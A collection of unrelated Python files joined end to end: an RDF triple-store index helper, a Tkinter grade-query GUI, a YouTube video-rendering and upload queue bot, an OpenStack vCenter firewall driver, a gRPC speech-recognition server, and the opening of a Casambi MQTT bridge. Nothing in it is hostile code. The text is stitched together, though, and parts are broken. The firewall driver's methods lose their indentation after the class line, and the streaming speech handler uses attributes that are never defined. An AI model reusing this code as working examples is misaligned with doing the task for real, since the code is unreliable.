    def __lookup(self, (subject, predicate, object), context, txn=None):
        """Map a query pattern onto (index, key-prefix, from_key,
        results_from_key) using the dispatch table built in open().

        The pattern bitmask is bit0=subject, bit1=predicate, bit2=object.
        """
        _to_string = self._to_string
        if context is not None:
            context = _to_string(context, txn=txn)
        i = 0
        if subject is not None:
            i += 1
            subject = _to_string(subject, txn=txn)
        if predicate is not None:
            i += 2
            predicate = _to_string(predicate, txn=txn)
        if object is not None:
            i += 4
            object = _to_string(object, txn=txn)
        index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
        # print (subject, predicate, object), context, prefix_func, index
        # #DEBUG
        prefix = bb(
            "^".join(prefix_func((subject, predicate, object), context)))
        return index, prefix, from_key, results_from_key
def to_key_func(i):
    """Return a serializer turning (triple, context) into the index key for
    the triple permutation starting at position *i*."""
    def to_key(triple, context):
        "Takes a string; returns key"
        fields = (context,
                  triple[i % 3],
                  triple[(i + 1) % 3],
                  triple[(i + 2) % 3],
                  b(""))  # empty tail so the key ends with a trailing ^
        return b("^").join(fields)
    return to_key
def from_key_func(i):
    """Return a parser that splits an index key for permutation *i* back
    into (context, s, p, o) strings."""
    def from_key(key):
        "Takes a key; returns string"
        parts = key.split(b("^"))
        context = parts[0]
        s = parts[(3 - i + 0) % 3 + 1]
        p = parts[(3 - i + 1) % 3 + 1]
        o = parts[(3 - i + 2) % 3 + 1]
        return context, s, p, o
    return from_key
def results_from_key_func(i, from_string):
    """Return a converter turning an index key (plus already-bound query
    terms) into the ((s, p, o), contexts) tuple yielded by triples().

    Terms already bound in the query are passed through untouched; only the
    unbound positions are decoded from the key via *from_string*.
    """
    def from_key(key, subject, predicate, object, contexts_value):
        "Takes a key and subject, predicate, object; returns tuple for yield"
        parts = key.split(b("^"))
        # TODO: i & 1: # dis assemble and/or measure to see which is faster
        s = subject if subject is not None else \
            from_string(parts[(3 - i + 0) % 3 + 1])
        p = predicate if predicate is not None else \
            from_string(parts[(3 - i + 1) % 3 + 1])
        o = object if object is not None else \
            from_string(parts[(3 - i + 2) % 3 + 1])
        contexts = (from_string(c) for c in contexts_value.split(b("^")) if c)
        return (s, p, o), contexts
    return from_key
def readable_index(i):
    """Render index bitmask *i* as e.g. "s,?,o" (bit0=s, bit1=p, bit2=o)."""
    slots = ["?", "?", "?"]
    for bit, label in enumerate("spo"):
        if i & (1 << bit):
            slots[bit] = label
    return "%s,%s,%s" % tuple(slots)
|
gui.py | import tkinter as tk
import threading
from QueryGrade.query_grade import query_grade
class Application:
    """Tk GUI for the grade-query tool.

    A scrollable result pane on top and a username/password form below;
    queries run on a worker thread so the UI stays responsive.
    """
    def __init__(self, master=None):
        self.master = master
        self.master.title('成绩查询')
        self.master.resizable(False, False)
        self.create_widgets()
        # True while a query thread is in flight; guards against re-entry.
        self.is_query = False
    def create_widgets(self):
        """Build the result text area (with both scrollbars) and the
        username/password/query-button row."""
        # result frame
        rf = tk.Frame(self.master)
        rf.pack(side=tk.TOP)
        xscrollbar = tk.Scrollbar(rf, orient=tk.HORIZONTAL)
        yscrollbar = tk.Scrollbar(rf)
        xscrollbar.grid(row=1, column=0, sticky=tk.N+tk.S+tk.E+tk.W)
        yscrollbar.grid(row=0, column=1, sticky=tk.N+tk.S+tk.E+tk.W)
        self.result = tk.Text(rf, wrap=tk.NONE,
                              xscrollcommand=xscrollbar.set,
                              yscrollcommand=yscrollbar.set)
        self.result.grid(row=0, column=0)
        xscrollbar.config(command=self.result.xview)
        yscrollbar.config(command=self.result.yview)
        # button frame
        bf = tk.Frame(self.master)
        bf.pack(side=tk.BOTTOM)
        self.username_label = tk.Label(bf, text="用户名")
        self.username_label.pack(side=tk.LEFT)
        self.username_input = tk.Entry(bf)
        self.username_input.pack(side=tk.LEFT)
        self.password_label = tk.Label(bf, text="密码")
        self.password_label.pack(side=tk.LEFT)
        self.password_input = tk.Entry(bf, show="*")
        self.password_input.pack(side=tk.LEFT)
        self.query_button = tk.Button(
            bf, text="查询", command=self.query, width=10)
        self.query_button.pack(side=tk.LEFT, padx=30, pady=10)
    def sub_thread(self, username, password):
        """Worker thread: run the (slow) grade query, then display the
        result in the text widget.

        NOTE(review): updating Tk widgets from a non-main thread is not
        officially thread-safe -- verify on the target platform.
        """
        self.is_query = True
        res = query_grade(username, password, output=False)
        self.is_query = False
        self.result.delete("1.0", tk.END)
        self.result.insert("1.0", res)
    def query(self):
        """Query-button handler: validate inputs, reject re-entry, and
        kick off the worker thread."""
        self.result.delete("1.0", tk.END)
        if self.is_query:
            self.result.insert("1.0", "查询中,请勿重复查询...")
            return
        username = self.username_input.get().strip()
        password = self.password_input.get().strip()
        if len(username) == 0 or len(password) == 0:
            self.result.insert("1.0", "请输入用户名和密码...")
            return
        T = threading.Thread(target=self.sub_thread, args=(username, password))
        T.start()
        self.result.insert("1.0", "查询中...")
# Build the Tk root window, attach the application and enter the event loop.
root = tk.Tk()
app = Application(master=root)
root.mainloop()
|
youtubequeue.py | import os
import settings
settings.generateConfigFile()
import soundfile as sf
from pydub import AudioSegment
import generatorclient
from time import sleep
from subprocess import *
import videouploader
from threading import Thread
import pickle
import datetime
from datetime import timedelta
from PIL import Image
import subprocess
import videoscript
import random
from moviepy.editor import *
# 18:00 19:00 20:00 23:00 00:00 01:00
waitTill = None
scriptIBuffer = []
def loadVideoScripts():
    """Unpickle every saved raw video script from settings.rawvideosaves
    and append it to videoscript.videoscripts."""
    saved_names = os.listdir(settings.rawvideosaves)
    print(saved_names)
    for name in saved_names:
        if "DS_Store" in name:
            continue  # skip macOS Finder metadata files
        save_path = settings.rawvideosaves + "/" + name
        with open(save_path, 'rb') as pickle_file:
            videoscript.videoscripts.append(pickle.load(pickle_file))
def parseScripts():
    """Ensure a music folder exists per genre (blocking forever if one is
    empty), then turn every buffered raw script into a VideoScriptEngine."""
    for musicType in generatorclient.musicTypes:
        if not os.path.exists(settings.assetPath + "/Music/%s" % musicType):
            print("Creating Music Path for %s: %s" % (musicType, settings.assetPath + "/Music/%s" % musicType))
            os.makedirs(settings.assetPath + "/Music/%s" % musicType)
        if len(os.listdir(settings.assetPath + "/Music/%s/" % musicType)) == 0:
            print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (settings.assetPath + "/Music/%s/" % musicType))
            # Deliberately blocks forever: the bot cannot proceed without
            # music, and the operator must restart after adding files.
            while True:
                sleep(10)
                print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (
                    settings.assetPath + "/Music/%s/" % musicType))
            pass
    if scriptIBuffer:
        for script in scriptIBuffer:
            # script layout: (scriptno, title, author, ups, payload-tuple)
            scriptno = script[0]
            print("Parsing Raw Script %s" % scriptno)
            scripttitle = script[1]
            author = script[2]
            ups = script[3]
            payload = script[4]
            final_script = payload[0]
            videotype = payload[1]
            video_settings = payload[2]
            music_type = payload[3]
            thumbnail = payload[4]
            characters_amount = payload[5]
            youtube_title = payload[6]
            youtube_description = payload[7]
            youtube_tags = payload[8]
            # Constructing the engine registers the script for rendering.
            videoscript.VideoScriptEngine(scriptno, scripttitle, author, ups, final_script, videotype, video_settings,
                                          music_type, thumbnail, characters_amount, youtube_title, youtube_description,
                                          youtube_tags)
        scriptIBuffer.clear()
    else:
        print("VIDEO GENERATOR no scripts to parse")
def uploadVids():
    """Currently a no-op; uploading is driven from tickThread() instead."""
    pass
"""
if renderedVids:
    for vid in renderedVids:
        vid.generateMovie()
    renderedVids.clear()
loadVideoScripts()
"""
def canUpload():
    """Return how many more videos may be uploaded today, or False.

    Counts uploads since the last YouTube API quota reset and subtracts
    them from settings.uploads_a_day.  Returns False when upload times
    are unavailable (callers distinguish int vs bool via type()).
    """
    if generatorclient.last_upload_times is not None:
        if generatorclient.last_upload_times == 0:
            # No uploads recorded at all: full daily quota available.
            return settings.uploads_a_day
        now = datetime.datetime.now()
        vids_within_day = 0
        for time in generatorclient.last_upload_times:
            time = time[0]
            if now.hour >= settings.youtube_api_quota_reset_hour:
                # Past today's reset: count uploads since the reset hour.
                if time > now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0):
                    vids_within_day += 1
            else:
                # Before today's reset: count uploads in the last 24h.
                if time >= now - timedelta(days=1):
                    vids_within_day += 1
        print("%s Videos uploaded since %s:00" % (vids_within_day, settings.youtube_api_quota_reset_hour))
        print("Estimated quote usage %s" % (vids_within_day * 1658))
        return settings.uploads_a_day - vids_within_day
    return False
def tickThread():
    """Main worker loop (runs forever on a background thread).

    Every ~10s: refresh last-upload times if missing, render any pending
    scripts, upload rendered ones while quota remains, and request new
    scripts from the generator server.  ``waitTill`` backs off uploading
    until the next quota reset after a failed upload.
    """
    global waitTill
    while True:
        sleep(5)
        if generatorclient.last_upload_times is None and not generatorclient.isRequestingScripts:
            print("No update times available... requesting more")
            generatorclient.getLastUploadedScripts()
        sleep(5)
        if videoscript.videoscripts:
            print("Rendering all video scripts...")
            for script in videoscript.videoscripts:
                script.renderVideo()
            # Clear the quota back-off once its deadline has passed.
            if waitTill is not None:
                if datetime.datetime.now() > waitTill:
                    waitTill = None
                else:
                    print("Out of Quote Response... waiting till %s" % waitTill)
            if settings.exportOffline:
                waitTill = None
            if not settings.exportOffline:
                if waitTill is None:
                    amount_to_upload = canUpload()
                    if type(amount_to_upload) is int:
                        scripts_available_to_upload = [script for i, script in enumerate(videoscript.videoscripts) if
                                                       script.isRendered]
                        print("Allowed to upload %s videos" % amount_to_upload)
                        if amount_to_upload > len(scripts_available_to_upload):
                            amount_to_upload = len(scripts_available_to_upload)
                            print("Only %s scripts available to upload" % amount_to_upload)
                        print("Uploading %s video scripts... %s ready to upload (total %s)" % (
                            amount_to_upload, amount_to_upload, len(videoscript.videoscripts)))
                        for i in range(0, amount_to_upload, 1):
                            upload = scripts_available_to_upload[i].uploadVideo()
                            try:
                                # upload is False when the API reports the
                                # quota is exhausted: back off until the
                                # next reset hour.
                                if upload is False:
                                    now = datetime.datetime.now()
                                    if now.hour > settings.youtube_api_quota_reset_hour:
                                        waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0) + timedelta(days=1)
                                    else:
                                        waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
                            except Exception as e:
                                print(e)
                                pass
                        # Force a refresh of upload times next tick.
                        generatorclient.last_upload_times = None
                    # elif type(amount_to_upload) is bool:
                    #     print("Can't get last update times")
                else:
                    print("Estimated out of quotes waiting till %s" % waitTill)
        else:
            print("No video scripts, just chilling...")
        if not generatorclient.isRequestingScripts:
            generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
def initQueue():
    """Create the working directories, load saved scripts, connect to the
    generator server, request scripts, and start the tick thread."""
    ## process = subprocess.call("wine /home/royalreddit/Desktop/balcon/balcon.exe -t supnerds -w /home/royalreddit/Desktop/test2.wav", shell = True)
    if not os.path.exists(settings.videoqueue_directory):
        os.mkdir(settings.videoqueue_directory)
    if not os.path.exists(settings.rawvideosaves):
        os.mkdir(settings.rawvideosaves)
    if not os.path.exists(settings.finishedvideosdirectory):
        os.mkdir(settings.finishedvideosdirectory)
    if not os.path.exists(settings.overlayPath):
        os.mkdir(settings.overlayPath)
    if not os.path.exists(f"{settings.currentPath}/TempVids"):
        os.mkdir(f"{settings.currentPath}/TempVids")
    loadVideoScripts()
    generatorclient.connectToServer()
    sleep(2)
    # Tell the server which scripts we already hold.
    generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
    thread = Thread(target=tickThread)
    thread.start()
    # uploadVids()
if __name__ == "__main__":
    # Validate the configuration (credentials, TTS engine choice, overlay
    # image) before starting the queue; any failure aborts startup.
    begin = True
    if not settings.exportOffline:
        videouploader.get_credentials()
    else:
        print("Video Generator launching in export offline mode")
    if not settings.noSpeech:
        # Exactly one TTS engine must be selected.
        if settings.use_balcon and settings.use_google_tts:
            print("You have selected to use both google tts and balcon tts! Please only select one in the config file!")
            begin = False
        if not settings.use_balcon and not settings.use_google_tts:
            print("You have not selected any tts options in the config file!"
                  " Please set either google tts or balcon tts to true! Not both!")
            begin = False
        if settings.use_balcon:
            # Smoke-test the balcon binary by synthesizing a short phrase.
            command = "%s -t \"%s\" -n %s" % (settings.balcon_location,
                                              "Balcon Voice Success", settings.balcon_voice)
            process = subprocess.call(command, shell=True)
            if process != 0:
                print("Balcon not found. This will work when the following command works in your commandline: %s" % ("%s -t \"%s\" -n %s" % (settings.balcon_location,
                                                                                                                                             "Balcon Voice Test", settings.balcon_voice)))
                begin = False
    if settings.use_overlay:
        # The overlay must exist and be exactly 1920x1080.
        if not os.path.exists(f"{settings.overlayPath}/{settings.overlay_image}"):
            print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} does not exist! Fix the file name in config.ini or set use_overlay=False")
            begin = False
        else:
            im = Image.open(f"{settings.overlayPath}/{settings.overlay_image}")
            width, height = im.size
            if width != 1920 or height != 1080:
                print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} not of correct dimensions ({width},{height})! Needs to be 1920x1080")
                begin = False
    if begin:
        initQueue()
|
vcenter_firewall.py | # Copyright 2015 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from multiprocessing import Process
from multiprocessing import Queue
import signal
import six
import threading
import time
import traceback
from neutron.agent import firewall
from oslo_log import log as logging
from oslo_vmware import exceptions as vmware_exceptions
from networking_vsphere._i18n import _LI
from networking_vsphere.common import exceptions
from networking_vsphere.common import vmware_conf as config
from networking_vsphere.utils import dvs_util
from networking_vsphere.utils import security_group_utils as sg_util
LOG = logging.getLogger(__name__)
CONF = config.CONF
CLEANUP_REMOVE_TASKS_TIMEDELTA = 60
def firewall_main(list_queues, remove_queue):
    """Entry point of the firewall child process: build the updater,
    install its SIGTERM handler, and run the update loop until told to
    stop."""
    fw_updater = DVSFirewallUpdater(list_queues, remove_queue)
    signal.signal(signal.SIGTERM, fw_updater._handle_sigterm)
    fw_updater.updater_loop()
class DVSFirewallUpdater(object):
    """Drives the firewall child process: drains the port queues and
    applies security-group updates/removals per DVS."""
    def __init__(self, list_queues, remove_queue):
        self.pq = PortQueue(list_queues, remove_queue)
        self.run_daemon_loop = True
        # Starts the self-rescheduling queue-draining timer loop.
        self.pq.port_updater_loop()
    def updater_loop(self):
        """Main loop: apply pending remove tasks, then update tasks; sleep
        when idle.  vCenter errors are logged and the loop continues."""
        while self.run_daemon_loop:
            try:
                dvs, r_ports = self.pq.get_remove_tasks()
                if dvs and r_ports:
                    remover(dvs, r_ports)
                dvs, ports = self.pq.get_update_tasks()
                if dvs and ports:
                    updater(dvs, ports)
                else:
                    time.sleep(1)
            except (vmware_exceptions.VMwareDriverException,
                    exceptions.VMWareDVSException) as e:
                LOG.debug("Exception was handled in firewall updater: %s. "
                          "Traceback: %s", e, traceback.format_exc())
    def _handle_sigterm(self, signum, frame):
        # SIGTERM handler installed by firewall_main(); stops updater_loop.
        LOG.info(_LI("Termination of firewall process called"))
        self.run_daemon_loop = False
class PortQueue(object):
    """Accumulates port update/remove requests from the parent process and
    hands them out in per-DVS batches to the firewall updater."""
    def __init__(self, list_queues, remove_queue):
        self.list_queues = list_queues
        self.remove_queue = remove_queue
        # port id -> removal timestamp; used to drop stale update tasks.
        self.removed = {}
        self.update_store = {}
        self.remove_store = {}
        self.networking_map = dvs_util.create_network_map_from_config(
            CONF.ML2_VMWARE)
    # Todo: add roundrobin for active DVS. SlOPS
    def get_update_tasks(self, number=5):
        """Return (dvs, up to *number* pending update tasks) for the first
        DVS with work, or (None, [])."""
        for dvs, tasks in six.iteritems(self.update_store):
            if tasks:
                ret = tasks[:number]
                self.update_store[dvs] = tasks[number:]
                return dvs, ret
        return None, []
    def get_remove_tasks(self):
        """Return (dvs, remove tasks whose ports are already free) for the
        first DVS with ready work, or (None, [])."""
        ret = []
        for dvs, tasks in six.iteritems(self.remove_store):
            # Iterate a snapshot: removing from the list being iterated
            # would silently skip the element after each removal.
            for task in list(tasks):
                key = task.get('binding:vif_details', {}).get('dvs_port_key')
                if dvs.check_free(key):
                    ret.append(task)
                    self.remove_store[dvs].remove(task)
            if ret:
                return dvs, ret
        return None, []
    def _get_update_tasks(self):
        """Drain all input queues into update_store, de-duplicating by port
        id (a newer request replaces the stored one)."""
        for queue in self.list_queues:
            while not queue.empty():
                request = queue.get()
                for port in request:
                    dvs = self.get_dvs(port)
                    if dvs:
                        stored_tasks = self.update_store.get(dvs, [])
                        index = next((i for i, p in enumerate(stored_tasks)
                                      if p['id'] == port['id']), None)
                        if index is not None:
                            stored_tasks[index] = port
                        else:
                            stored_tasks.append(port)
                        self.update_store[dvs] = stored_tasks
    def _get_remove_tasks(self):
        """Drain the remove queue into remove_store, recording removal
        times in self.removed."""
        while not self.remove_queue.empty():
            port = self.remove_queue.get()
            dvs = self.get_dvs(port)
            if dvs:
                self.remove_store.setdefault(dvs, []).append(port)
                self.removed[port['id']] = time.time()
    def _cleanup_removed(self):
        """Forget removals older than CLEANUP_REMOVE_TASKS_TIMEDELTA s."""
        current_time = time.time()
        # Iterate a snapshot: deleting entries while iterating the dict
        # itself raises RuntimeError on Python 3.
        for port_id, remove_time in list(self.removed.items()):
            if current_time - remove_time > CLEANUP_REMOVE_TASKS_TIMEDELTA:
                del self.removed[port_id]
    def get_dvs(self, port):
        """Resolve the DVS a port belongs to: by uuid when present in
        vif_details, otherwise by network id / port-group name."""
        dvs_uuid = port.get('binding:vif_details', {}).get('dvs_id')
        if dvs_uuid:
            dvs = dvs_util.get_dvs_by_uuid(
                self.networking_map.values(), dvs_uuid)
        else:
            port_network = port['network_id']
            port_network_name = port.get('binding:vif_details', {}).get(
                'dvs_port_group_name')
            dvs = dvs_util.get_dvs_by_network(
                self.networking_map.values(), port_network, port_network_name)
        return dvs
    def port_updater_loop(self):
        """Drain queues, drop updates for already-removed ports, clean up
        the removal log, and reschedule itself every second."""
        self._get_update_tasks()
        self._get_remove_tasks()
        for dvs in self.update_store:
            self.update_store[dvs] = [item for item in self.update_store[dvs]
                                      if item['id'] not in self.removed]
        self._cleanup_removed()
        threading.Timer(1, self.port_updater_loop).start()
@dvs_util.wrap_retry
def updater(dvs, port_list):
    """Apply security-group rule updates for *port_list* on *dvs*
    (retried on transient vCenter errors via wrap_retry)."""
    sg_util.update_port_rules(dvs, port_list)
def remover(dvs, ports_list):
    """Release every port in *ports_list* from *dvs*; no-op when *dvs* is
    falsy."""
    if not dvs:
        return
    for port in ports_list:
        dvs.release_port(port)
class DVSFirewallDriver(firewall.FirewallDriver):
"""DVS Firewall Driver. """
def __init__(self):
self.dvs_ports = {}
self._defer_apply = False
self.list_queues = []
for x in six.moves.range(10):
self.list_queues.append(Queue())
self.remove_queue = Queue()
self.fw_process = Process(
target=firewall_main, args=(self.list_queues, self.remove_queue))
self.fw_process.start()
self.networking_map = dvs_util.create_network_map_from_config(
CONF.ML2_VMWARE)
def _get_port_dvs(self, port):
dvs_uuid = port.get('binding:vif_details', {}).get('dvs_id')
if dvs_uuid:
dvs = dvs_util.get_dvs_by_uuid(
self.networking_map.values(), dvs_uuid)
else:
port_network = port['network_id']
port_network_name = port.get('binding:vif_details', {}).get(
'dvs_port_group_name')
dvs = dvs_util.get_dvs_by_network(
self.networking_map.values(), port_network, port_network_name)
return dvs
def stop_all(self):
self.fw_process.terminate()
def prepare_port_filter(self, ports):
self._process_port_filter(ports)
def apply_port_filter(self, ports):
self._process_port_filter(ports)
def update_port_filter(self, ports):
self._process_port_filter(ports)
def _process_port_filter(self, ports):
LOG.info(_LI("Set security group rules for ports %s"),
[p['id'] for p in ports])
ports_for_update = []
for port in ports:
port_device = port['device']
stored_port_key = self.dvs_ports.get(port_device, {}). \
get('binding:vif_details', {}).get('dvs_port_key')
port_key = port.get('binding:vif_details', {}).get('dvs_port_key')
if port_key and port_key != stored_port_key:
port_dvs = self._get_port_dvs(port)
if port_dvs:
try:
port_info = port_dvs.get_port_info(port)
if port['id'] == port_info.config.name:
self.dvs_ports[port_device] = port
ports_for_update.append(port)
else:
self.dvs_ports.pop(port_device, None)
except exceptions.PortNotFound:
self.dvs_ports.pop(port_device, None)
else:
self.dvs_ports.pop(port_device, None)
else:
self.dvs_ports[port_device] = port
ports_for_update.append(port)
self._apply_sg_rules_for_port(ports_for_update)
def remove_port_filter(self, ports):
LOG.info(_LI("Remove ports with rules"))
for p_id in ports:
port = self.dvs_ports.get(p_id)
if port:
self.remove_queue.put(port)
self.dvs_ports.pop(p_id, None)
@property
def ports(self):
return self.dvs_ports
def _apply_sg_rules_for_port(self, ports):
for port in ports:
queue = self._get_free_queue()
port['security_group_rules'].append(
{u'ethertype': u'IPv6', u'direction': u'ingress',
u'source_ip_prefix': u'::/0', u'protocol': u'ipv6-icmp'})
port = sg_util.filter_port_sg_rules_by_ethertype(port)
queue.put([{'id': port['id'], 'network_id': port['network_id'],
'security_group_rules': port['security_group_rules'],
'binding:vif_details': port['binding:vif_details']}])
def _get_free_queue(self):
shortest_queue = self.list_queues[0]
for queue in self.list_queues:
queue_size = queue.qsize()
if queue_size == 0:
return queue
if queue_size < shortest_queue.qsize():
shortest_queue = queue
return shortest_queue
def update_security_group_rules(self, sg_id, sg_rules):
    # Intentionally a no-op in this driver.
    pass
def security_groups_provider_updated(self):
    # RPC hook kept for interface compatibility; nothing to do here.
    LOG.info(_LI("Ignoring default security_groups_provider_updated RPC."))
def update_security_group_members(self, sg_id, sg_members):
    # Intentionally a no-op in this driver.
    pass
def security_group_updated(self, action_type, sec_group_ids,
                           device_id=None):
    # Intentionally a no-op in this driver.
    pass
def filter_defer_apply_on(self):
    # Deferred-apply batching is not supported; no-op.
    pass
def filter_defer_apply_off(self):
    # Deferred-apply batching is not supported; no-op.
    pass
|
server.py | import grpc
import torch
import numpy as np
import collections
import time
import threading
from marshmallow.exceptions import ValidationError
from . import speech_pb2, speech_pb2_grpc
from patter import ModelFactory
from patter.config import ServerConfiguration
from patter.data import AudioSegment
from patter.decoder import DecoderFactory
from patter.data.features import PerturbedSpectrogramFeaturizer
class SpeechServicer(speech_pb2_grpc.SpeechServicer):
    """gRPC servicer implementing batch (``Recognize``) and streaming
    (``StreamingRecognize``) speech-to-text on top of a patter acoustic model.
    """

    def __init__(self, model_path, decoder_config, language="en-US", cuda=False):
        """Load the acoustic model, decoder and featurizer.

        Args:
            model_path: path to a serialized patter model.
            decoder_config: configuration consumed by ``DecoderFactory``.
            language: language tag this servicer accepts (requests with a
                different ``language_code`` are rejected).
            cuda: move the model to GPU when True.
        """
        self._model = ModelFactory.load(model_path)
        self._decoder = DecoderFactory.create(decoder_config, self._model.labels)
        self._featurizer = PerturbedSpectrogramFeaturizer.from_config(self._model.input_cfg)
        self._language = language
        self._use_cuda = cuda
        if self._use_cuda:
            self._model = self._model.cuda()
        # Inference only: freeze dropout / batch-norm behavior.
        self._model.eval()

    def _raw_data_to_samples(self, data, sample_rate=16000, encoding=None):
        """Decode raw audio bytes into a numpy int16 sample vector.

        Raises:
            ValueError: for any combination other than 16 kHz LINEAR16.
        """
        # TODO: support other encodings
        if sample_rate == 16000 and encoding == speech_pb2.RecognitionConfig.LINEAR16:
            signal = np.frombuffer(data, dtype=np.int16)
        else:
            raise ValueError("Unsupported audio data configuration")
        # BUG FIX: the previous version unconditionally reset `signal = None`
        # here, discarding the decoded buffer so the method always returned None.
        return signal

    def Recognize(self, request, context):
        """Handle a one-shot recognition request and return up to
        ``max_alternatives`` deduplicated transcripts."""
        print("Handling batch request.")
        config = request.config
        # check audio format (sample rate, encoding) to convert if necessary
        if config.language_code != self._language:
            context.set_code(grpc.StatusCode.FAILED_PRECONDITION)
            context.set_details('Requested unsupported language')
            return
        # Clamp requested alternatives to [1, 30].
        max_alternatives = max(min(config.max_alternatives, 30), 1)
        # get samples
        samples = self._raw_data_to_samples(request.audio.content, sample_rate=config.sample_rate_hertz, encoding=config.encoding)
        segment = AudioSegment(samples, config.sample_rate_hertz, target_sr=self._model.input_cfg['sample_rate'])
        # featurize -> shape (1, 1, freq, time) expected by the model
        features = self._featurizer.process_segment(segment)
        features = features.unsqueeze(0).unsqueeze(0)
        # run model
        output, output_len = self._model(torch.autograd.Variable(features, requires_grad=False),
                                         torch.autograd.Variable(torch.IntTensor([features.size(3)]), requires_grad=False))
        output = output.transpose(0, 1)
        # decode
        decoded_output, offsets, scores = self._decoder.decode(output.data, output_len.data, num_results=max_alternatives)
        # build output message, skipping duplicate transcripts
        alternatives = []
        transcripts = set([])
        for idx in range(min(max_alternatives, len(decoded_output[0]))):
            transcript = decoded_output[0][idx].strip().lower()
            if transcript not in transcripts:
                transcripts.add(transcript)
            else:
                continue
            transcript_words = transcript.split()
            words = []
            # Word-level detail only for the best hypothesis.
            if idx == 0:
                for w in transcript_words:
                    words.append(speech_pb2.WordInfo(word=w))
            alternatives.append(speech_pb2.SpeechRecognitionAlternative(transcript=transcript, confidence=scores[0][idx], words=words))
        # may be multiple results if there are multiple chunks created
        results = [speech_pb2.SpeechRecognitionResult(alternatives=alternatives)]
        response = speech_pb2.RecognizeResponse(results=results)
        return response

    def StreamingRecognize(self, request_iterator, context):
        """Handle a bidirectional streaming recognition request.

        The first message must carry ``streaming_config``; subsequent
        messages carry audio chunks which a background thread drains into
        ``sample_buffer`` while this generator yields partial transcripts.

        NOTE(review): this method references attributes never set in
        ``__init__`` (``_flush_time``, ``_min_buffer``, ``_max_buffer``,
        ``_parser``, ``_model_sample_rate``, ``_get_np_from_deque``) and a
        decoder call signature that differs from ``Recognize`` — it appears
        to predate the current model API and needs reconciliation before use.
        """
        print("Handling stream request...")
        # BUG FIX: `request_iterator.next()` is Python-2-only; use next().
        config_wrapper = next(request_iterator)
        if not config_wrapper.HasField("streaming_config"):
            # return an error
            context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
            context.set_details('First StreamingRequest must be a configuration request')
            return
        stream_config = config_wrapper.streaming_config
        # check audio format (sample rate, encoding) to convert if necessary
        if stream_config.config.language_code != self._language:
            context.set_code(grpc.StatusCode.FAILED_PRECONDITION)
            context.set_details('Requested unsupported language')
            return
        sample_buffer = collections.deque()
        done = False
        last_incoming = time.time()

        def read_incoming():
            # BUG FIX: without `nonlocal` the assignment below created a
            # function-local variable, so the outer staleness check never
            # observed new audio arriving.
            nonlocal last_incoming
            try:
                while 1:
                    received = next(request_iterator)
                    samples = self._raw_data_to_samples(received.audio_content, sample_rate=stream_config.config.sample_rate_hertz, encoding=stream_config.config.encoding)
                    sample_buffer.extend(samples)
                    last_incoming = time.time()
            except StopIteration:
                print("reached end")
                return
            except ValueError:
                context.set_code(grpc.StatusCode.UNIMPLEMENTED)
                context.set_details('Unable to handle requested audio type')
                raise ValueError('Unable to handle requested audio type')

        thread = threading.Thread(target=read_incoming)
        thread.daemon = True
        thread.start()
        last_check = time.time()
        full_transcript = ""
        hidden = None
        result = None
        last_buffer_size = -1
        while 1:
            stream_done = time.time() - last_incoming > self._flush_time
            if len(sample_buffer) > self._min_buffer or (time.time() - last_check >= self._flush_time and len(sample_buffer) > self._min_buffer):
                last_check = time.time()
                signal = self._get_np_from_deque(sample_buffer, size=min(len(sample_buffer), self._max_buffer), reserve=int(0.4 * self._model_sample_rate))
                spect = self._parser.parse_audio_data(signal).contiguous()
                spect = spect.view(1, 1, spect.size(0), spect.size(1))
                out, _ = self._model(torch.autograd.Variable(spect, volatile=True), hidden)
                out = out.transpose(0, 1)  # TxNxH
                decoded_output, _, _, _ = self._decoder.decode(out.data[:-19, :, :])
                full_transcript += decoded_output[0][0]
                alt = speech_pb2.SpeechRecognitionAlternative(transcript=full_transcript)
                result = speech_pb2.StreamingRecognitionResult(alternatives=[alt], is_final=done)
                out = speech_pb2.StreamingRecognizeResponse(results=[result])
                # if stream_done:
                #     return out
                yield out
            else:
                last_check = time.time()
                time.sleep(0.01)

    @classmethod
    def from_config(cls, server_config):
        """Build a servicer from a marshmallow-validated server configuration."""
        try:
            cfg = ServerConfiguration().load(server_config)
            if len(cfg.errors) > 0:
                raise ValidationError(cfg.errors)
        except ValidationError as err:
            raise err
        return cls(cfg.data['model_path'], cfg.data['decoder'], language=cfg.data['language'], cuda=cfg.data['cuda'])
|
server.py | #!/usr/bin/python3
import casambi
import yaml
import logging
import logging.handlers
import json
import time
import websocket
import paho.mqtt.client as mqtt
import queue
import multiprocessing
import socket
import re
from time import sleep
from setproctitle import setproctitle
def parse_config(config_file='casambi.yaml'):
    """Load the casambi YAML configuration and validate required keys.

    Args:
        config_file: path to the YAML configuration file.

    Returns:
        The parsed configuration dict.

    Raises:
        casambi.ConfigException: if a required key is missing.
    """
    with open(config_file, 'r') as stream:
        config = yaml.safe_load(stream)
    # BUG FIX: the original reported 'api_key' as the missing key for
    # network_password/user_password (copy-paste error); name the real key.
    for required in ('api_key', 'email', 'network_password', 'user_password'):
        if required not in config:
            raise casambi.ConfigException(
                '{} is not present in configuration'.format(required))
    return config
def set_unit_value(api_key, email, network_password, user_password, unit_id):
    # One-shot helper: open a user + network session and a websocket,
    # switch the given unit on, then close the websocket again.
    user_session_id = casambi.create_user_session(email=email, api_key=api_key, user_password=user_password)
    network_ids = casambi.create_network_session(api_key=api_key, email=email, network_password=network_password)
    wire_id = 1
    # Only the first network of the account is used.
    network_id = list(network_ids)[0]
    # NOTE(review): result unused; call may be needed for its side effects — confirm.
    network_information = casambi.get_network_information(user_session_id=user_session_id, network_id=network_id, api_key=api_key)
